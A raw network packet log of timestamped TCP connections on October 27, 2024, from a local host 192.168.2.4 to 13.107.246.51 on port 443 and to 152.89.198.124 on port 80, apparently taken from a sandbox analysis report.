Oct 27, 2024 17:11:32.974462032 CET	443	57884	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.017865896 CET	443	57886	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.018291950 CET	57886	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.018301964 CET	443	57886	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.018671036 CET	57886	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.018676996 CET	443	57886	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.045613050 CET	443	57887	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.045907974 CET	57887	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.045934916 CET	443	57887	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.046230078 CET	57887	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.046241045 CET	443	57887	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.100497961 CET	443	57883	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.100552082 CET	443	57883	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.100616932 CET	57883	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.100665092 CET	443	57883	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.100703001 CET	443	57883	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.100758076 CET	57883	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.100852966 CET	57883	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.100886106 CET	443	57883	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.100910902 CET	57883	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.100924969 CET	443	57883	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.102859974 CET	443	57885	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.102883101 CET	443	57885	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.102920055 CET	443	57885	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.102955103 CET	57885	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.102991104 CET	57885	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.103076935 CET	57885	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.103076935 CET	57885	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.103108883 CET	443	57885	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.103132963 CET	443	57885	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.103337049 CET	443	57884	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.103398085 CET	443	57884	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.103451967 CET	57884	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.103516102 CET	443	57884	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.103563070 CET	57884	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.104077101 CET	57888	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.104079008 CET	57884	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.104093075 CET	443	57884	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.104105949 CET	57884	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.104114056 CET	443	57884	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.104116917 CET	443	57888	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.104177952 CET	57888	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.104756117 CET	57888	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.104773998 CET	443	57888	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.105252981 CET	57889	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.105330944 CET	443	57889	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.105421066 CET	57889	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.105518103 CET	57889	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.105547905 CET	443	57889	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.106010914 CET	57890	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.106023073 CET	443	57890	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.106091022 CET	57890	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.106206894 CET	57890	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.106220007 CET	443	57890	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.147692919 CET	443	57886	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.147849083 CET	443	57886	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.147918940 CET	57886	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.147947073 CET	57886	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.147953033 CET	443	57886	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.148020983 CET	57886	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.148025990 CET	443	57886	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.149682045 CET	57891	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.149719000 CET	443	57891	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.149792910 CET	57891	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.149893045 CET	57891	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.149918079 CET	443	57891	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.175368071 CET	443	57887	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.175524950 CET	443	57887	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.175616026 CET	57887	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.175676107 CET	57887	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.175676107 CET	57887	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.175694942 CET	443	57887	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.175715923 CET	443	57887	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.177321911 CET	57892	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.177407026 CET	443	57892	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.177515030 CET	57892	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.177613020 CET	57892	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.177643061 CET	443	57892	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.444535017 CET	57878	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:33.444844961 CET	57893	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:33.450987101 CET	80	57893	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:33.451067924 CET	57893	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:33.451251030 CET	57893	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:33.451622963 CET	80	57878	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:33.451684952 CET	57878	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:33.456510067 CET	80	57893	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:33.865837097 CET	443	57888	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.865870953 CET	443	57889	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.865967035 CET	443	57890	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.866461992 CET	57889	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.866497040 CET	443	57889	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.866533041 CET	57888	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.866550922 CET	443	57888	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.866964102 CET	57889	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.866980076 CET	443	57889	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.867202997 CET	57890	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.867213964 CET	443	57890	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.867230892 CET	57888	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.867238045 CET	443	57888	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.867531061 CET	57890	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.867536068 CET	443	57890	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.903244972 CET	443	57892	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.903654099 CET	57892	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.903712988 CET	443	57892	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.904443026 CET	57892	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.904474020 CET	443	57892	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.909024000 CET	443	57891	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.909306049 CET	57891	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.909324884 CET	443	57891	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.909635067 CET	57891	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.909646034 CET	443	57891	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.993872881 CET	443	57889	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.993953943 CET	443	57889	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.994014978 CET	57889	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.994040012 CET	443	57889	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.994071960 CET	443	57889	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.994333029 CET	57889	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.994415998 CET	57889	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.994446039 CET	443	57889	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.994472027 CET	57889	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.994486094 CET	443	57889	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.995784998 CET	443	57888	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.995923042 CET	443	57888	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.995981932 CET	57888	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.996193886 CET	57888	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.996212959 CET	443	57888	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.996226072 CET	57888	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.996234894 CET	443	57888	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.996781111 CET	443	57890	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.996854067 CET	443	57890	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.996908903 CET	57890	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.997980118 CET	57890	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.997986078 CET	443	57890	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:33.997997046 CET	57890	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:33.998001099 CET	443	57890	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.000718117 CET	57894	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.000802040 CET	443	57894	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.000890017 CET	57894	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.001008034 CET	57895	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.001061916 CET	443	57895	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.001137972 CET	57895	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.001235962 CET	57894	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.001285076 CET	443	57894	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.001326084 CET	57895	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.001363039 CET	443	57895	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.001759052 CET	57896	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.001810074 CET	443	57896	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.001873970 CET	57896	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.002038002 CET	57896	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.002057076 CET	443	57896	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.031229019 CET	443	57892	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.031411886 CET	443	57892	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.031495094 CET	57892	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.031563044 CET	57892	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.031590939 CET	443	57892	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.031639099 CET	57892	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.031655073 CET	443	57892	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.033968925 CET	57897	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.034039974 CET	443	57897	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.034142971 CET	57897	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.034315109 CET	57897	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.034348011 CET	443	57897	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.042227983 CET	443	57891	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.042295933 CET	443	57891	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.042356014 CET	57891	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.042378902 CET	443	57891	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.042406082 CET	443	57891	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.042462111 CET	57891	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.042493105 CET	57891	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.042511940 CET	443	57891	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.042535067 CET	57891	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.042545080 CET	443	57891	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.044538975 CET	57898	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.044621944 CET	443	57898	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.044728994 CET	57898	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.044887066 CET	57898	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.044928074 CET	443	57898	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.330238104 CET	80	57893	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:34.330315113 CET	57893	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:34.845635891 CET	443	57897	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.845928907 CET	443	57896	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.846035957 CET	443	57898	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.846266031 CET	443	57894	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.846287966 CET	57897	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.846322060 CET	443	57897	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.846980095 CET	57897	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.846992016 CET	443	57897	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.847141027 CET	443	57895	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.847394943 CET	57896	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.847423077 CET	57895	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.847479105 CET	443	57895	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.847484112 CET	443	57896	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.847806931 CET	57895	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.847820997 CET	443	57895	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.847987890 CET	57896	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.848006010 CET	443	57896	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.848258972 CET	57898	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.848273993 CET	443	57898	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.848547935 CET	57898	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.848558903 CET	443	57898	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.848803997 CET	57894	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.848839998 CET	443	57894	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.849308968 CET	57894	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.849328041 CET	443	57894	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.975488901 CET	443	57898	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.975655079 CET	443	57895	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.975786924 CET	443	57898	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.975876093 CET	57898	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.975908995 CET	443	57895	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.975945950 CET	57898	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.975945950 CET	57898	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.975984097 CET	57895	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.975986958 CET	443	57898	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.976015091 CET	443	57898	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.976027966 CET	443	57894	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.976036072 CET	57895	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.976063967 CET	443	57895	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.976089954 CET	57895	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.976094961 CET	443	57894	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.976104021 CET	443	57895	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.976181984 CET	57894	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.976212025 CET	443	57894	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.976214886 CET	443	57897	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.976248026 CET	443	57894	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.976316929 CET	57894	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.976433039 CET	443	57897	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.976433039 CET	57894	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.976457119 CET	443	57894	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.976495981 CET	57894	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.976496935 CET	57897	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.976510048 CET	443	57894	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.977821112 CET	57897	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.977847099 CET	443	57897	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.977897882 CET	57897	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.977910995 CET	443	57897	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.979691982 CET	57899	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.979727030 CET	443	57899	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.979820013 CET	57899	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.980099916 CET	57900	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.980128050 CET	443	57900	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.980154991 CET	443	57896	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.980191946 CET	57900	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.980268002 CET	443	57896	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.980329037 CET	57896	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.980451107 CET	57899	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.980479956 CET	443	57899	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.980587959 CET	57900	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.980601072 CET	443	57900	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.980732918 CET	57896	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.980732918 CET	57896	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.980753899 CET	443	57896	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.980776072 CET	443	57896	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.980969906 CET	57901	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.981008053 CET	443	57901	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.981076002 CET	57901	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.981167078 CET	57901	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.981182098 CET	443	57901	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.982021093 CET	57902	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.982031107 CET	443	57902	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.982109070 CET	57902	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.982304096 CET	57902	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.982316971 CET	443	57902	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.983038902 CET	57903	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.983048916 CET	443	57903	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:34.983124971 CET	57903	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.983264923 CET	57903	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:34.983277082 CET	443	57903	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:35.703762054 CET	443	57900	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:35.704355955 CET	57900	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:35.704387903 CET	443	57900	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:35.704854965 CET	57900	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:35.704862118 CET	443	57900	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:35.713005066 CET	443	57902	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:35.713375092 CET	57902	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:35.713385105 CET	443	57902	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:35.713797092 CET	57902	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:35.713802099 CET	443	57902	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:35.717981100 CET	443	57903	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:35.718396902 CET	57903	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:35.718461037 CET	443	57903	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:35.718941927 CET	57903	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:35.718961000 CET	443	57903	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:35.723537922 CET	443	57901	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:35.723911047 CET	57901	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:35.723932028 CET	443	57901	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:35.724437952 CET	57901	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:35.724448919 CET	443	57901	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:35.751142979 CET	443	57899	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:35.751559019 CET	57899	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:35.751601934 CET	443	57899	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:35.752199888 CET	57899	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:35.752213001 CET	443	57899	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:35.831211090 CET	443	57900	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:35.831273079 CET	443	57900	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:35.831331968 CET	57900	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:35.831342936 CET	443	57900	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:35.831389904 CET	443	57900	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:35.831440926 CET	57900	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:35.831533909 CET	57900	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:35.831547976 CET	443	57900	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:35.831557989 CET	57900	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:35.831564903 CET	443	57900	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:35.835160017 CET	57904	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:35.835223913 CET	443	57904	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:35.835303068 CET	57904	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:35.835442066 CET	57904	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:35.835457087 CET	443	57904	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:35.840914011 CET	443	57902	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:35.841053963 CET	443	57902	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:35.841145992 CET	57902	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:35.841200113 CET	57902	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:35.841200113 CET	57902	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:35.841206074 CET	443	57902	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:35.841212034 CET	443	57902	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:35.843161106 CET	57905	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:35.843264103 CET	443	57905	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:35.843338013 CET	57905	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:35.843440056 CET	57905	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:35.843475103 CET	443	57905	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:35.846288919 CET	443	57903	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:35.846434116 CET	443	57903	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:35.846493959 CET	57903	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:35.846550941 CET	57903	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:35.846550941 CET	57903	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:35.846589088 CET	443	57903	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:35.846616983 CET	443	57903	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:35.848563910 CET	57906	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:35.848588943 CET	443	57906	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:35.848653078 CET	57906	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:35.848752975 CET	57906	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:35.848774910 CET	443	57906	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:35.855986118 CET	443	57901	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:35.856012106 CET	443	57901	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:35.856045008 CET	443	57901	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:35.856059074 CET	57901	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:35.856097937 CET	57901	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:35.856787920 CET	57901	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:35.856805086 CET	443	57901	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:35.856827974 CET	57901	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:35.856841087 CET	443	57901	13.107.246.51	192.168.2.4
